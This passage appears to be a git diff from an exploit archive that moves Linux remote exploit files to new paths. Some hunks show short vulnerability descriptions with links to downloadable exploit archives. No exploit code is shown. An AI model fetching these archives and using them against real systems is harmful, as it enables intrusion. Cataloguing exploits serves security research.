newline at end of file diff --git a/platforms/linux/remote/25035.txt b/exploits/linux/remote/25035.txt similarity index 92% rename from platforms/linux/remote/25035.txt rename to exploits/linux/remote/25035.txt index cf16d9e9a..ed94ce3f5 100644 --- a/platforms/linux/remote/25035.txt +++ b/exploits/linux/remote/25035.txt @@ -4,4 +4,4 @@ PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the Successful exploitation of this issue will result in execution of arbitrary code as the user of the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25035.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25035.zip \ No newline at end of file diff --git a/platforms/linux/remote/25036.txt b/exploits/linux/remote/25036.txt similarity index 92% rename from platforms/linux/remote/25036.txt rename to exploits/linux/remote/25036.txt index 7b1afed02..317857690 100644 --- a/platforms/linux/remote/25036.txt +++ b/exploits/linux/remote/25036.txt @@ -4,4 +4,4 @@ PCAL is prone to a buffer overflow vulnerability. This issue is exposed when the Successful exploitation of this issue will result in execution of arbitrary code as the user of the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25036.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25036.zip \ No newline at end of file diff --git a/platforms/linux/remote/25054.txt b/exploits/linux/remote/25054.txt similarity index 100% rename from platforms/linux/remote/25054.txt rename to exploits/linux/remote/25054.txt diff --git a/platforms/linux/remote/25122.txt b/exploits/linux/remote/25122.txt similarity index 100% rename from platforms/linux/remote/25122.txt rename to exploits/linux/remote/25122.txt diff --git a/platforms/linux/remote/25150.txt b/exploits/linux/remote/25150.txt similarity index 93% rename from platforms/linux/remote/25150.txt rename to exploits/linux/remote/25150.txt index f9be56eb8..6593356ef 100644 --- a/platforms/linux/remote/25150.txt +++ b/exploits/linux/remote/25150.txt @@ -4,4 +4,4 @@ A remotely exploitable client-side directory-traversal vulnerability affects Win An attacker may leverage this issue by distributing malicious ACE archives to unsuspecting users. This issue will allow an attacker to write files to arbitrary locations on the filesystem with the privileges of an unsuspecting user that extracts the malicious ACE archive. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25150.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25150.zip \ No newline at end of file diff --git a/platforms/linux/remote/25221.txt b/exploits/linux/remote/25221.txt similarity index 100% rename from platforms/linux/remote/25221.txt rename to exploits/linux/remote/25221.txt diff --git a/platforms/linux/remote/25275.c b/exploits/linux/remote/25275.c similarity index 100% rename from platforms/linux/remote/25275.c rename to exploits/linux/remote/25275.c diff --git a/platforms/linux/remote/25297.txt b/exploits/linux/remote/25297.txt similarity index 100% rename from platforms/linux/remote/25297.txt rename to exploits/linux/remote/25297.txt diff --git a/platforms/linux/remote/253.pl b/exploits/linux/remote/253.pl similarity index 100% rename from platforms/linux/remote/253.pl rename to exploits/linux/remote/253.pl diff --git a/platforms/linux/remote/25321.c b/exploits/linux/remote/25321.c similarity index 100% rename from platforms/linux/remote/25321.c rename to exploits/linux/remote/25321.c diff --git a/platforms/linux/remote/25375.pl b/exploits/linux/remote/25375.pl similarity index 100% rename from platforms/linux/remote/25375.pl rename to exploits/linux/remote/25375.pl diff --git a/platforms/linux/remote/25392.c b/exploits/linux/remote/25392.c similarity index 100% rename from platforms/linux/remote/25392.c rename to exploits/linux/remote/25392.c diff --git a/platforms/linux/remote/25517.rb b/exploits/linux/remote/25517.rb similarity index 100% rename from platforms/linux/remote/25517.rb rename to exploits/linux/remote/25517.rb diff --git a/platforms/linux/remote/25526.c b/exploits/linux/remote/25526.c similarity index 100% rename from platforms/linux/remote/25526.c rename to exploits/linux/remote/25526.c diff --git a/platforms/linux/remote/25547.pl b/exploits/linux/remote/25547.pl similarity index 100% rename from platforms/linux/remote/25547.pl rename to exploits/linux/remote/25547.pl diff --git a/platforms/linux/remote/25669.txt b/exploits/linux/remote/25669.txt similarity index 100% rename from platforms/linux/remote/25669.txt rename to exploits/linux/remote/25669.txt diff --git a/platforms/linux/remote/25706.cpp b/exploits/linux/remote/25706.cpp similarity index 100% rename from platforms/linux/remote/25706.cpp rename to exploits/linux/remote/25706.cpp diff --git a/platforms/linux/remote/25775.rb b/exploits/linux/remote/25775.rb similarity index 100% rename from platforms/linux/remote/25775.rb rename to exploits/linux/remote/25775.rb diff --git a/platforms/linux/remote/25802.txt b/exploits/linux/remote/25802.txt similarity index 100% rename from platforms/linux/remote/25802.txt rename to exploits/linux/remote/25802.txt diff --git a/platforms/linux/remote/25820.txt b/exploits/linux/remote/25820.txt similarity index 100% rename from platforms/linux/remote/25820.txt rename to exploits/linux/remote/25820.txt diff --git a/platforms/linux/remote/25970.py b/exploits/linux/remote/25970.py similarity index 100% rename from platforms/linux/remote/25970.py rename to exploits/linux/remote/25970.py diff --git a/platforms/linux/remote/25975.rb b/exploits/linux/remote/25975.rb similarity index 100% rename from platforms/linux/remote/25975.rb rename to exploits/linux/remote/25975.rb diff --git a/platforms/linux/remote/26.sh b/exploits/linux/remote/26.sh similarity index 100% rename from platforms/linux/remote/26.sh rename to exploits/linux/remote/26.sh diff --git a/platforms/linux/remote/26024.txt b/exploits/linux/remote/26024.txt similarity index 100% rename from platforms/linux/remote/26024.txt rename to exploits/linux/remote/26024.txt diff --git a/platforms/linux/remote/26101.txt b/exploits/linux/remote/26101.txt similarity index 100% rename from platforms/linux/remote/26101.txt rename to exploits/linux/remote/26101.txt diff --git a/platforms/linux/remote/26198.txt b/exploits/linux/remote/26198.txt similarity index 100% rename from platforms/linux/remote/26198.txt rename to exploits/linux/remote/26198.txt diff --git a/platforms/linux/remote/26288.txt b/exploits/linux/remote/26288.txt similarity index 100% rename from platforms/linux/remote/26288.txt rename to exploits/linux/remote/26288.txt diff --git a/platforms/linux/remote/26419.rb b/exploits/linux/remote/26419.rb similarity index 100% rename from platforms/linux/remote/26419.rb rename to exploits/linux/remote/26419.rb diff --git a/platforms/linux/remote/26422.rb b/exploits/linux/remote/26422.rb similarity index 100% rename from platforms/linux/remote/26422.rb rename to exploits/linux/remote/26422.rb diff --git a/platforms/linux/remote/26536.txt b/exploits/linux/remote/26536.txt similarity index 100% rename from platforms/linux/remote/26536.txt rename to exploits/linux/remote/26536.txt diff --git a/platforms/linux/remote/26540.txt b/exploits/linux/remote/26540.txt similarity index 92% rename from platforms/linux/remote/26540.txt rename to exploits/linux/remote/26540.txt index 7a6f3c30a..406b1d101 100644 --- a/platforms/linux/remote/26540.txt +++ b/exploits/linux/remote/26540.txt @@ -4,4 +4,4 @@ Inkscape is prone to a buffer overflow vulnerability. This issue is due to a fai When the application processes a malformed SVG image file, it results in a buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code in the context of the victim user. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/26540.svg \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/26540.svg \ No newline at end of file diff --git a/platforms/linux/remote/26741.pl b/exploits/linux/remote/26741.pl similarity index 100% rename from platforms/linux/remote/26741.pl rename to exploits/linux/remote/26741.pl diff --git a/platforms/linux/remote/26913.c b/exploits/linux/remote/26913.c similarity index 100% rename from platforms/linux/remote/26913.c rename to exploits/linux/remote/26913.c diff --git a/platforms/linux/remote/27.pl b/exploits/linux/remote/27.pl similarity index 100% rename from platforms/linux/remote/27.pl rename to exploits/linux/remote/27.pl diff --git a/platforms/linux/remote/27032.txt b/exploits/linux/remote/27032.txt similarity index 100% rename from platforms/linux/remote/27032.txt rename to exploits/linux/remote/27032.txt diff --git a/platforms/linux/remote/27045.rb b/exploits/linux/remote/27045.rb similarity index 100% rename from platforms/linux/remote/27045.rb rename to exploits/linux/remote/27045.rb diff --git a/platforms/linux/remote/27150.txt b/exploits/linux/remote/27150.txt similarity index 100% rename from platforms/linux/remote/27150.txt rename to exploits/linux/remote/27150.txt diff --git a/platforms/linux/remote/27233.txt b/exploits/linux/remote/27233.txt similarity index 100% rename from platforms/linux/remote/27233.txt rename to exploits/linux/remote/27233.txt diff --git a/platforms/linux/remote/27234.txt b/exploits/linux/remote/27234.txt similarity index 100% rename from platforms/linux/remote/27234.txt rename to exploits/linux/remote/27234.txt diff --git a/platforms/linux/remote/27235.txt b/exploits/linux/remote/27235.txt similarity index 100% rename from platforms/linux/remote/27235.txt rename to exploits/linux/remote/27235.txt diff --git a/platforms/linux/remote/27244.txt b/exploits/linux/remote/27244.txt similarity index 100% rename from platforms/linux/remote/27244.txt rename to exploits/linux/remote/27244.txt diff --git a/platforms/linux/remote/27326.txt b/exploits/linux/remote/27326.txt similarity index 100% rename from platforms/linux/remote/27326.txt rename to exploits/linux/remote/27326.txt diff --git a/platforms/linux/remote/27397.txt b/exploits/linux/remote/27397.txt similarity index 100% rename from platforms/linux/remote/27397.txt rename to exploits/linux/remote/27397.txt diff --git a/platforms/linux/remote/27630.txt b/exploits/linux/remote/27630.txt similarity index 100% rename from platforms/linux/remote/27630.txt rename to exploits/linux/remote/27630.txt diff --git a/platforms/linux/remote/277.c b/exploits/linux/remote/277.c similarity index 100% rename from platforms/linux/remote/277.c rename to exploits/linux/remote/277.c diff --git a/platforms/linux/remote/27801.txt b/exploits/linux/remote/27801.txt similarity index 100% rename from platforms/linux/remote/27801.txt rename to exploits/linux/remote/27801.txt diff --git a/platforms/linux/remote/27802.txt b/exploits/linux/remote/27802.txt similarity index 100% rename from platforms/linux/remote/27802.txt rename to exploits/linux/remote/27802.txt diff --git a/platforms/linux/remote/279.c b/exploits/linux/remote/279.c similarity index 100% rename from platforms/linux/remote/279.c rename to exploits/linux/remote/279.c diff --git a/platforms/linux/remote/27902.txt b/exploits/linux/remote/27902.txt similarity index 100% rename from platforms/linux/remote/27902.txt rename to exploits/linux/remote/27902.txt diff --git a/platforms/linux/remote/27987.html b/exploits/linux/remote/27987.html similarity index 100% rename from platforms/linux/remote/27987.html rename to exploits/linux/remote/27987.html diff --git a/platforms/linux/remote/28181.c b/exploits/linux/remote/28181.c similarity index 100% rename from platforms/linux/remote/28181.c rename to exploits/linux/remote/28181.c diff --git a/platforms/linux/remote/282.c b/exploits/linux/remote/282.c similarity index 100% rename from platforms/linux/remote/282.c rename to exploits/linux/remote/282.c diff --git a/platforms/linux/remote/28314.c b/exploits/linux/remote/28314.c similarity index 100% rename from platforms/linux/remote/28314.c rename to exploits/linux/remote/28314.c diff --git a/platforms/linux/remote/28334.rb b/exploits/linux/remote/28334.rb similarity index 100% rename from platforms/linux/remote/28334.rb rename to exploits/linux/remote/28334.rb diff --git a/platforms/linux/remote/28397.sh b/exploits/linux/remote/28397.sh similarity index 100% rename from platforms/linux/remote/28397.sh rename to exploits/linux/remote/28397.sh diff --git a/platforms/linux/remote/28398.txt b/exploits/linux/remote/28398.txt similarity index 100% rename from platforms/linux/remote/28398.txt rename to exploits/linux/remote/28398.txt diff --git a/platforms/linux/remote/284.c b/exploits/linux/remote/284.c similarity index 100% rename from platforms/linux/remote/284.c rename to exploits/linux/remote/284.c diff --git a/platforms/linux/remote/28424.txt b/exploits/linux/remote/28424.txt similarity index 100% rename from platforms/linux/remote/28424.txt rename to exploits/linux/remote/28424.txt diff --git a/platforms/linux/remote/2856.pm b/exploits/linux/remote/2856.pm similarity index 100% rename from platforms/linux/remote/2856.pm rename to exploits/linux/remote/2856.pm diff --git a/platforms/linux/remote/2858.c b/exploits/linux/remote/2858.c similarity index 100% rename from platforms/linux/remote/2858.c rename to exploits/linux/remote/2858.c diff --git a/platforms/linux/remote/28595.txt b/exploits/linux/remote/28595.txt similarity index 100% rename from platforms/linux/remote/28595.txt rename to exploits/linux/remote/28595.txt diff --git a/platforms/linux/remote/28639.rb b/exploits/linux/remote/28639.rb similarity index 100% rename from platforms/linux/remote/28639.rb rename to exploits/linux/remote/28639.rb diff --git a/platforms/linux/remote/29033.html b/exploits/linux/remote/29033.html similarity index 100% rename from platforms/linux/remote/29033.html rename to exploits/linux/remote/29033.html diff --git a/platforms/linux/remote/29160.c b/exploits/linux/remote/29160.c similarity index 100% rename from platforms/linux/remote/29160.c rename to exploits/linux/remote/29160.c diff --git a/platforms/linux/remote/29302.txt b/exploits/linux/remote/29302.txt similarity index 100% rename from platforms/linux/remote/29302.txt rename to exploits/linux/remote/29302.txt diff --git a/platforms/linux/remote/29321.rb b/exploits/linux/remote/29321.rb similarity index 100% rename from platforms/linux/remote/29321.rb rename to exploits/linux/remote/29321.rb diff --git a/platforms/linux/remote/29323.rb b/exploits/linux/remote/29323.rb similarity index 100% rename from platforms/linux/remote/29323.rb rename to exploits/linux/remote/29323.rb diff --git a/platforms/linux/remote/29324.rb b/exploits/linux/remote/29324.rb similarity index 100% rename from platforms/linux/remote/29324.rb rename to exploits/linux/remote/29324.rb diff --git a/platforms/linux/remote/2933.c b/exploits/linux/remote/2933.c similarity index 100% rename from platforms/linux/remote/2933.c rename to exploits/linux/remote/2933.c diff --git a/platforms/linux/remote/2936.pl b/exploits/linux/remote/2936.pl similarity index 100% rename from platforms/linux/remote/2936.pl rename to exploits/linux/remote/2936.pl diff --git a/platforms/linux/remote/29383.txt b/exploits/linux/remote/29383.txt similarity index 100% rename from platforms/linux/remote/29383.txt rename to exploits/linux/remote/29383.txt diff --git a/platforms/linux/remote/29471.txt b/exploits/linux/remote/29471.txt similarity index 90% rename from platforms/linux/remote/29471.txt rename to exploits/linux/remote/29471.txt index 059a58a26..8345e65f4 100644 --- a/platforms/linux/remote/29471.txt +++ b/exploits/linux/remote/29471.txt @@ -6,4 +6,4 @@ A remote attacker can exploit this issue to gain control of mouse and keyboard H Versions prior to 2.25 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29471.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29471.tar.gz \ No newline at end of file diff --git a/platforms/linux/remote/29496.txt b/exploits/linux/remote/29496.txt similarity index 100% rename from platforms/linux/remote/29496.txt rename to exploits/linux/remote/29496.txt diff --git a/platforms/linux/remote/29513.rb b/exploits/linux/remote/29513.rb similarity index 100% rename from platforms/linux/remote/29513.rb rename to exploits/linux/remote/29513.rb diff --git a/platforms/linux/remote/29527.pl b/exploits/linux/remote/29527.pl similarity index 100% rename from platforms/linux/remote/29527.pl rename to exploits/linux/remote/29527.pl diff --git a/platforms/linux/remote/2959.sql b/exploits/linux/remote/2959.sql similarity index 100% rename from platforms/linux/remote/2959.sql rename to exploits/linux/remote/2959.sql diff --git a/platforms/linux/remote/29595.txt b/exploits/linux/remote/29595.txt similarity index 100% rename from platforms/linux/remote/29595.txt rename to exploits/linux/remote/29595.txt diff --git a/platforms/linux/remote/296.c b/exploits/linux/remote/296.c similarity index 100% rename from platforms/linux/remote/296.c rename to exploits/linux/remote/296.c diff --git a/platforms/linux/remote/29689.py b/exploits/linux/remote/29689.py similarity index 100% rename from platforms/linux/remote/29689.py rename to exploits/linux/remote/29689.py diff --git a/platforms/linux/remote/29690.py b/exploits/linux/remote/29690.py similarity index 100% rename from platforms/linux/remote/29690.py rename to exploits/linux/remote/29690.py diff --git a/platforms/linux/remote/29691.py b/exploits/linux/remote/29691.py similarity index 100% rename from platforms/linux/remote/29691.py rename to exploits/linux/remote/29691.py diff --git a/platforms/linux/remote/29706.txt b/exploits/linux/remote/29706.txt similarity index 100% rename from platforms/linux/remote/29706.txt rename to exploits/linux/remote/29706.txt diff --git a/platforms/linux/remote/29734.txt b/exploits/linux/remote/29734.txt similarity index 100% rename from platforms/linux/remote/29734.txt rename to exploits/linux/remote/29734.txt diff --git a/platforms/linux/remote/29739.txt b/exploits/linux/remote/29739.txt similarity index 100% rename from platforms/linux/remote/29739.txt rename to exploits/linux/remote/29739.txt diff --git a/platforms/linux/remote/29753.c b/exploits/linux/remote/29753.c similarity index 100% rename from platforms/linux/remote/29753.c rename to exploits/linux/remote/29753.c diff --git a/platforms/linux/remote/29768.txt b/exploits/linux/remote/29768.txt similarity index 92% rename from platforms/linux/remote/29768.txt rename to exploits/linux/remote/29768.txt index e12a56cf7..aeb34b53e 100644 --- a/platforms/linux/remote/29768.txt +++ b/exploits/linux/remote/29768.txt @@ -4,4 +4,4 @@ Mozilla Firefox is prone to vulnerability that may allow attackers to obtain pot A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29768.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29768.zip \ No newline at end of file diff --git a/platforms/linux/remote/29769.txt b/exploits/linux/remote/29769.txt similarity index 92% rename from platforms/linux/remote/29769.txt rename to exploits/linux/remote/29769.txt index 90a92f838..db149814a 100644 --- a/platforms/linux/remote/29769.txt +++ b/exploits/linux/remote/29769.txt @@ -4,4 +4,4 @@ Opera is prone to vulnerability that may allow attackers to obtain potentially s A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29769.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29769.zip \ No newline at end of file diff --git a/platforms/linux/remote/29770.txt b/exploits/linux/remote/29770.txt similarity index 92% rename from platforms/linux/remote/29770.txt rename to exploits/linux/remote/29770.txt index 25a832875..d3c9af538 100644 --- a/platforms/linux/remote/29770.txt +++ b/exploits/linux/remote/29770.txt @@ -4,4 +4,4 @@ KDE Konqueror is prone to a vulnerability that may allow attackers to obtain pot A successful exploit of this issue would cause the affected application to connect to arbitrary TCP ports and potentially reveal sensitive information about services that are running on the affected computer. Information obtained may aid attackers in further attacks. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29770.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29770.zip \ No newline at end of file diff --git a/platforms/linux/remote/29932.txt b/exploits/linux/remote/29932.txt similarity index 100% rename from platforms/linux/remote/29932.txt rename to exploits/linux/remote/29932.txt diff --git a/platforms/linux/remote/30018.py b/exploits/linux/remote/30018.py similarity index 100% rename from platforms/linux/remote/30018.py rename to exploits/linux/remote/30018.py diff --git a/platforms/linux/remote/30043.txt b/exploits/linux/remote/30043.txt similarity index 91% rename from platforms/linux/remote/30043.txt rename to exploits/linux/remote/30043.txt index 7f884b516..7558fec5b 100644 --- a/platforms/linux/remote/30043.txt +++ b/exploits/linux/remote/30043.txt @@ -6,7 +6,7 @@ An attacker can exploit these issues to crash the affected application, effectiv Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30043.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30043.zip CVE: 2007-2788 & 2007-2789 OSVDB-ID: 36199 & 36200 \ No newline at end of file diff --git a/platforms/linux/remote/30074.txt b/exploits/linux/remote/30074.txt similarity index 100% rename from platforms/linux/remote/30074.txt rename to exploits/linux/remote/30074.txt diff --git a/platforms/linux/remote/30089.txt b/exploits/linux/remote/30089.txt similarity index 93% rename from platforms/linux/remote/30089.txt rename to exploits/linux/remote/30089.txt index cb54c4194..447915c63 100644 --- a/platforms/linux/remote/30089.txt +++ b/exploits/linux/remote/30089.txt @@ -6,4 +6,4 @@ Attacker-supplied script code would run in the context of the affected site, pot This issue affects Ruby on Rails 1.2.3; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30089.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30089.tgz \ No newline at end of file diff --git a/platforms/linux/remote/30142.txt b/exploits/linux/remote/30142.txt similarity index 91% rename from platforms/linux/remote/30142.txt rename to exploits/linux/remote/30142.txt index 339f2575e..2c3bbf75b 100644 --- a/platforms/linux/remote/30142.txt +++ b/exploits/linux/remote/30142.txt @@ -4,4 +4,4 @@ GDB is prone to a buffer-overflow vulnerability because it fails to properly che Attackers could leverage this issue to run arbitrary code outside of a restricted environment, which may lead to privilege escalation. Symantec has not confirmed code execution. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30142.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30142.zip \ No newline at end of file diff --git a/platforms/linux/remote/30186.txt b/exploits/linux/remote/30186.txt similarity index 100% rename from platforms/linux/remote/30186.txt rename to exploits/linux/remote/30186.txt diff --git a/platforms/linux/remote/3021.txt b/exploits/linux/remote/3021.txt similarity index 67% rename from platforms/linux/remote/3021.txt rename to exploits/linux/remote/3021.txt index 85603359d..6d72f977a 100644 --- a/platforms/linux/remote/3021.txt +++ b/exploits/linux/remote/3021.txt @@ -2,6 +2,6 @@ # solareclipse at phreedom dot org # GPG key ID: E36B11B7 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/3021.tar.gz (12262006-proftpd-not-pro-enough.tar.gz) # milw0rm.com [2003-10-15] \ No newline at end of file diff --git a/platforms/linux/remote/30284.vbs b/exploits/linux/remote/30284.vbs similarity index 100% rename from platforms/linux/remote/30284.vbs rename to exploits/linux/remote/30284.vbs diff --git a/platforms/linux/remote/30285.txt b/exploits/linux/remote/30285.txt similarity index 100% rename from platforms/linux/remote/30285.txt rename to exploits/linux/remote/30285.txt diff --git a/platforms/linux/remote/30291.txt b/exploits/linux/remote/30291.txt similarity index 92% rename from platforms/linux/remote/30291.txt rename to exploits/linux/remote/30291.txt index 55b9e08ad..b8d0eab03 100644 --- a/platforms/linux/remote/30291.txt +++ b/exploits/linux/remote/30291.txt @@ -11,4 +11,4 @@ ClamAV prior to 0.91 Other applications using the vulnerabile 'UnRAR' utility are affected by this issue. We will update this BID as more information emerges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30291.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30291.rar \ No newline at end of file diff --git a/platforms/linux/remote/303.pl b/exploits/linux/remote/303.pl similarity index 100% rename from platforms/linux/remote/303.pl rename to exploits/linux/remote/303.pl diff --git a/platforms/linux/remote/30319.c b/exploits/linux/remote/30319.c similarity index 100% rename from platforms/linux/remote/30319.c rename to exploits/linux/remote/30319.c diff --git a/platforms/linux/remote/304.c b/exploits/linux/remote/304.c similarity index 100% rename from platforms/linux/remote/304.c rename to exploits/linux/remote/304.c diff --git a/platforms/linux/remote/30439.txt b/exploits/linux/remote/30439.txt similarity index 100% rename from platforms/linux/remote/30439.txt rename to exploits/linux/remote/30439.txt diff --git a/platforms/linux/remote/30454.txt b/exploits/linux/remote/30454.txt similarity index 100% rename from platforms/linux/remote/30454.txt rename to exploits/linux/remote/30454.txt diff --git a/platforms/linux/remote/30469.rb b/exploits/linux/remote/30469.rb similarity index 100% rename from platforms/linux/remote/30469.rb rename to exploits/linux/remote/30469.rb diff --git a/platforms/linux/remote/30471.rb b/exploits/linux/remote/30471.rb similarity index 100% rename from platforms/linux/remote/30471.rb rename to exploits/linux/remote/30471.rb diff --git a/platforms/linux/remote/30535.pl b/exploits/linux/remote/30535.pl similarity index 100% rename from platforms/linux/remote/30535.pl rename to exploits/linux/remote/30535.pl diff --git a/platforms/linux/remote/30536.pl b/exploits/linux/remote/30536.pl similarity index 100% rename from platforms/linux/remote/30536.pl rename to exploits/linux/remote/30536.pl diff --git a/platforms/linux/remote/30543.txt b/exploits/linux/remote/30543.txt similarity index 92% rename from platforms/linux/remote/30543.txt rename to exploits/linux/remote/30543.txt index f59617626..7e0065f31 100644 --- a/platforms/linux/remote/30543.txt +++ b/exploits/linux/remote/30543.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex Doomsday Engine 1.90-beta5.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30543.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30543.zip \ No newline at end of file diff --git a/platforms/linux/remote/30677.pl b/exploits/linux/remote/30677.pl similarity index 100% rename from platforms/linux/remote/30677.pl rename to exploits/linux/remote/30677.pl diff --git a/platforms/linux/remote/307.py b/exploits/linux/remote/307.py similarity index 100% rename from platforms/linux/remote/307.py rename to exploits/linux/remote/307.py diff --git a/platforms/linux/remote/30711.txt b/exploits/linux/remote/30711.txt similarity index 100% rename from platforms/linux/remote/30711.txt rename to exploits/linux/remote/30711.txt diff --git a/platforms/linux/remote/30728.txt b/exploits/linux/remote/30728.txt similarity index 92% rename from platforms/linux/remote/30728.txt rename to exploits/linux/remote/30728.txt index 2a99a44fb..0818ffa90 100644 --- a/platforms/linux/remote/30728.txt +++ b/exploits/linux/remote/30728.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to inject and execute arbitrary malicious Per Yarssr 0.2.2 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30728.rss \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30728.rss \ No newline at end of file diff --git a/platforms/linux/remote/30736.txt b/exploits/linux/remote/30736.txt similarity index 100% rename from platforms/linux/remote/30736.txt rename to exploits/linux/remote/30736.txt diff --git a/platforms/linux/remote/308.c b/exploits/linux/remote/308.c similarity index 100% rename from platforms/linux/remote/308.c rename to exploits/linux/remote/308.c diff --git a/platforms/linux/remote/30907.txt b/exploits/linux/remote/30907.txt similarity index 92% rename from platforms/linux/remote/30907.txt rename to exploits/linux/remote/30907.txt index 2ce711c47..f6ca54bca 100644 --- a/platforms/linux/remote/30907.txt +++ b/exploits/linux/remote/30907.txt @@ -8,4 +8,4 @@ This issue affects Adobe Flash Player 9.0.48.0, 8.0.35.0, and prior versions. NOTE: This issue was previously disclosed in BID 26929 (Adobe Flash Player Multiple Security Vulnerabilities) but has been assigned its own BID because new technical details are available. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30907.as \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30907.as \ No newline at end of file diff --git a/platforms/linux/remote/30971.txt b/exploits/linux/remote/30971.txt similarity index 92% rename from platforms/linux/remote/30971.txt rename to exploits/linux/remote/30971.txt index bf54cc38e..03ba361ce 100644 --- a/platforms/linux/remote/30971.txt +++ b/exploits/linux/remote/30971.txt @@ -9,4 +9,4 @@ Successfully exploiting these issues allows remote attackers to execute arbitrar Georgia SoftWorks Secure Shell Server 7.01.0003 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30971.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/30971.zip \ No newline at end of file diff --git a/platforms/linux/remote/3099.pm b/exploits/linux/remote/3099.pm similarity index 100% rename from platforms/linux/remote/3099.pm rename to exploits/linux/remote/3099.pm diff --git a/platforms/linux/remote/30998.py b/exploits/linux/remote/30998.py similarity index 100% rename from platforms/linux/remote/30998.py rename to exploits/linux/remote/30998.py diff --git a/platforms/linux/remote/31051.txt b/exploits/linux/remote/31051.txt similarity index 100% rename from platforms/linux/remote/31051.txt rename to exploits/linux/remote/31051.txt diff --git a/platforms/linux/remote/31052.java b/exploits/linux/remote/31052.java similarity index 100% rename from platforms/linux/remote/31052.java rename to exploits/linux/remote/31052.java diff --git a/platforms/linux/remote/31076.py b/exploits/linux/remote/31076.py similarity index 100% rename from platforms/linux/remote/31076.py rename to exploits/linux/remote/31076.py diff --git a/platforms/linux/remote/31127.txt b/exploits/linux/remote/31127.txt similarity index 100% rename from platforms/linux/remote/31127.txt rename to exploits/linux/remote/31127.txt diff --git a/platforms/linux/remote/31309.c b/exploits/linux/remote/31309.c similarity index 100% rename from platforms/linux/remote/31309.c rename to exploits/linux/remote/31309.c diff --git a/platforms/linux/remote/31396.txt b/exploits/linux/remote/31396.txt similarity index 100% rename from platforms/linux/remote/31396.txt rename to exploits/linux/remote/31396.txt diff --git a/platforms/linux/remote/31432.rb b/exploits/linux/remote/31432.rb similarity index 100% rename from platforms/linux/remote/31432.rb rename to exploits/linux/remote/31432.rb diff --git a/platforms/linux/remote/31462.c b/exploits/linux/remote/31462.c similarity index 100% rename from platforms/linux/remote/31462.c rename to exploits/linux/remote/31462.c diff --git a/platforms/linux/remote/31518.rb b/exploits/linux/remote/31518.rb similarity index 100% rename from platforms/linux/remote/31518.rb rename to exploits/linux/remote/31518.rb diff --git a/platforms/linux/remote/31540.php b/exploits/linux/remote/31540.php similarity index 100% rename from platforms/linux/remote/31540.php rename to exploits/linux/remote/31540.php diff --git a/platforms/linux/remote/31591.txt b/exploits/linux/remote/31591.txt similarity index 92% rename from platforms/linux/remote/31591.txt rename to exploits/linux/remote/31591.txt index c27196b66..6ef402b18 100644 --- a/platforms/linux/remote/31591.txt +++ b/exploits/linux/remote/31591.txt @@ -6,4 +6,4 @@ Exploiting this issue allows an attacker to access arbitrary files outside of th LANDesk Management Suite 8.80.1.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31591.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31591.zip \ No newline at end of file diff --git a/platforms/linux/remote/31630.txt b/exploits/linux/remote/31630.txt similarity index 91% rename from platforms/linux/remote/31630.txt rename to exploits/linux/remote/31630.txt index 4973b1b79..9354f97c2 